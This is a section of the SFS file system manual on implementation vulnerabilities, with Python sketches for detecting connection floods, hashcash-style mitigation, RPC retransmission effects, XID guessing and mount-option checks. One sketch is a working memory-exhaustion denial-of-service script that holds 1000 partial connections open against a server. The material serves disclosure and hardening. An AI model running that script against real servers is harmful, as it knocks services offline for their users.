Node: implementation vulnerabilities, Previous: exposed vulnerabilities, Up: Security
The best way to attack the SFS software is probably to cause resource exhaustion. You can try to run SFS out of file descriptors, memory, CPU time, or mount points.
An attacker can run a server out of file descriptors by opening many parallel TCP connections. Such attacks can be detected by using the netstat command to see who is connecting to SFS (which accepts connections on TCP port 4). Users can run the client (and also sfsauthd) out of descriptors by connecting many times using the setgid program /usr/local/lib/sfs-0.6/suidconnect. These attacks can be traced using a tool like lsof, available from ftp://vic.cc.purdue.edu/pub/tools/unix/lsof.
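For example, the following sketch counts established TCP connections to the SFS port for each remote address, so that a flood of parallel connections from a single host stands out. It assumes a Linux-style /proc/net/tcp; on other systems, parse the output of netstat -n instead.

     # Count established TCP connections to the SFS port (4) per remote host.
     SFS_PORT = 4

     def connections_by_peer(path="/proc/net/tcp"):
         counts = {}
         with open(path) as f:
             next(f)                            # skip the header line
             for line in f:
                 fields = line.split()
                 local, remote, state = fields[1], fields[2], fields[3]
                 if state != "01":              # keep only ESTABLISHED
                     continue
                 if int(local.split(":")[1], 16) != SFS_PORT:
                     continue
                 peer = remote.split(":")[0]    # hex-encoded remote address
                 counts[peer] = counts.get(peer, 0) + 1
         return counts

     if __name__ == "__main__":
         peers = connections_by_peer()
         for peer, n in sorted(peers.items(), key=lambda x: -x[1]):
             print(peer, n)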
SFS enforces a maximum size of just over 64 K on all RPC requests. Nonetheless, a client could connect 1000 times, send the first 64 K of a slightly larger message on each connection, and then just sit there. Because SFS waits patiently for the rest of each request, this would tie up about 64 megabytes of server memory.
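A rough sketch of that attack is below. The host name is a placeholder, and the 4-byte record-marking header (high bit plus a 31-bit length) is an assumption about how the RPC stream is framed over TCP; the point is only that each stalled connection leaves the server holding a large partial buffer.

     import socket, struct

     CONNS, CHUNK = 1000, 64 * 1024
     # each stalled connection ties up roughly CHUNK bytes on the server
     print("memory tied up: about %d MB" % (CONNS * CHUNK // (1024 * 1024)))

     socks = []
     for _ in range(CONNS):
         s = socket.create_connection(("sfs.example.com", 4))  # placeholder host
         # announce a record slightly larger than 64 K ...
         s.sendall(struct.pack(">I", 0x80000000 | (CHUNK + 1)))
         s.sendall(b"\0" * CHUNK)               # ... but send only the first 64 K
         socks.append(s)                        # then just sit there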
A worse problem is that SFS servers do not currently flow-control clients. Thus, an attacker could make many RPCs but never read the replies, causing the SFS server to buffer an arbitrary amount of data and run out of memory. (The server does, of course, free any buffered data once the TCP connection closes.)
Connecting to an SFS server costs the server tens of milliseconds of CPU time. An attacker can therefore try to burn a huge amount of the server's CPU time by connecting to it many times. The effects of such attacks can be mitigated using hashcash (see HashCost).
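The idea is to make the client pay for each connection with CPU time of its own before the server performs its expensive work. The sketch below is a minimal hashcash-style puzzle, not SFS's actual HashCost protocol; SHA-1 and the 16-bit difficulty are illustrative assumptions.

     import hashlib, itertools

     def solve(challenge, bits):
         # find a suffix such that SHA-1(challenge + suffix) starts with
         # bits/4 zero hex digits; costs the client about 2**bits hashes
         target = "0" * (bits // 4)
         for i in itertools.count():
             suffix = str(i).encode()
             if hashlib.sha1(challenge + suffix).hexdigest().startswith(target):
                 return suffix

     def verify(challenge, suffix, bits):
         # the server's check is a single hash, so flooding the server with
         # connections costs the attacker far more than it costs the server
         target = "0" * (bits // 4)
         return hashlib.sha1(challenge + suffix).hexdigest().startswith(target)

     suffix = solve(b"server-challenge", 16)           # client burns CPU here
     assert verify(b"server-challenge", suffix, 16)    # server verifies cheaply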
Finally, a user on a client can cause a large number of file systems to be mounted. If the operating system has a limit on the number of mount points, a user could run the client out of mount points.
If a TCP connection is reset, the SFS client will attempt to reconnect to the server and retransmit whatever RPCs were pending when the connection dropped. Not all NFS RPCs are idempotent, however. Thus, an attacker who caused a connection to reset at just the right time could, for instance, make a mkdir command return EEXIST when in fact it had just created the directory.
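The effect is easy to see in isolation. The sketch below is not SFS code; it just shows why blindly retransmitting a non-idempotent MKDIR misleads the caller.

     import errno, os, tempfile

     path = os.path.join(tempfile.mkdtemp(), "newdir")

     def mkdir_rpc(p):
         # stand-in for the server-side MKDIR handler
         try:
             os.mkdir(p)
             return "OK"
         except FileExistsError:
             return "EEXIST (%d)" % errno.EEXIST

     print(mkdir_rpc(path))   # original request succeeds, but the reply is lost
     print(mkdir_rpc(path))   # the retransmission reports EEXIST to the caller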
SFS exchanges NFS traffic with the local operating system over the loopback interface. An attacker with physical access to the local Ethernet may be able to inject arbitrary packets into a machine, including packets addressed to 127.0.0.1. Without packet filtering in place, an attacker can also send packets from anywhere, making them appear to come from 127.0.0.1.
On the client, an attacker can forge NFS requests from the kernel to SFS, or forge replies from SFS to the kernel. The SFS client encrypts file handles before giving them to the operating system. Thus, the attacker is unlikely to be able to forge a request from the kernel to SFS that contains a valid file handle. In the other direction, however, a reply need not contain a file handle. The attacker may well be able to get the kernel to accept a forged reply from SFS; he only needs to guess a (possibly quite predictable) 32-bit RPC XID. Such an attack could result, for example, in a user getting the wrong data when reading a file.
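To see why predictability matters: a forged reply is accepted only if its XID matches a pending request, so with truly random 32-bit XIDs a single forgery succeeds with probability 2^-32, while a sequential allocator (the hypothetical one sketched below) lets an attacker who has seen or estimated recent values succeed within a small window of guesses.

     # hypothetical sequential XID allocator, as many RPC stacks use
     def next_xid(counter=[0x4000]):
         counter[0] = (counter[0] + 1) & 0xFFFFFFFF
         return counter[0]

     observed = next_xid()                  # an XID the attacker estimated earlier
     pending = next_xid()                   # XID of the victim's request in flight
     window = [(observed + i) & 0xFFFFFFFF for i in range(1, 5)]
     print("blind forgery succeeds with probability %.2e" % (1 / 2**32))
     print("pending XID %s is in the attacker's window: %s"
           % (hex(pending), pending in window))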
On the server side, you must also assume the attacker cannot guess a valid NFS file handle (otherwise, you already have no security--see NFS security). However, the attacker might again forge NFS replies, this time from the kernel to the SFS server software.
To prevent such attacks, if your operating system supports IP filtering, it is a good idea to block any packets to or from 127.0.0.1 that do not arrive on the loopback interface. Blocking traffic "from" 127.0.0.1 at your firewall is also a good idea.
On BSD-based systems (and possibly others) the buffer reclaiming policy can cause deadlock. When an operation needs a buffer and there are no clean buffers available, the kernel picks some particular dirty buffer and won't let the operation complete until it can get that buffer. This can lead to deadlock in the case that two machines mount each other.
An attacker may be able to read the contents of a private file shortly after you log out of a public workstation if he can then become root on the workstation. Two attacks are possible.
First, the attacker may be able to read data out of physical memory or from the swap partition of the local disk. File data may still be in memory if the kernel's NFS 3 code has cached it in the buffer cache. There may also be fragments of file data in the memory of the sfsrwcd process, or out on disk in the swap partition (though sfsrwcd does its best to avoid getting paged out). The attacker can read any remaining file contents once he gains control of the machine.
Alternatively, the attacker may have recorded encrypted session traffic between the client and server. Once he gains control of the client machine, he can attach to the sfsrwcd process with a debugger and learn the session key if the session is still open. This lets him read the session he recorded in encrypted form.
To minimize the risk of these attacks, you must kill and restart sfscd before turning control of a public workstation over to another user. Even this is not guaranteed to fix the problem. It will flush file blocks from the buffer cache by unmounting all file systems, for example, but the contents of those blocks may persist as uninitialized data in buffers sitting on the free list. Similarly, any programs you ran that manipulated private file data may have been paged out to disk, and that information may live on after the processes exit.
In conclusion, if you are paranoid, it is best not to use public workstations.
SFS does its best to disable setuid programs and devices on the remote file servers it mounts. However, we have only tested this on operating systems we have access to. When porting SFS to new platforms, it is worth verifying that neither setuid programs nor device nodes work over SFS. Otherwise, any user of an SFS client can become root.
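One quick porting check is to confirm that SFS file systems end up mounted with the nosuid and nodev options. The sketch below assumes a Linux-style /proc/mounts and that SFS mounts appear under /sfs; on BSD systems, parse the output of mount instead.

     def unsafe_sfs_mounts(path="/proc/mounts"):
         # return SFS mount points that are missing nosuid or nodev
         bad = []
         with open(path) as f:
             for line in f:
                 dev, mountpoint, fstype, opts = line.split()[:4]
                 if not mountpoint.startswith("/sfs"):
                     continue
                 if not {"nosuid", "nodev"} <= set(opts.split(",")):
                     bad.append((mountpoint, opts))
         return bad

     if __name__ == "__main__":
         for mountpoint, opts in unsafe_sfs_mounts():
             print("WARNING: %s mounted with options %s" % (mountpoint, opts))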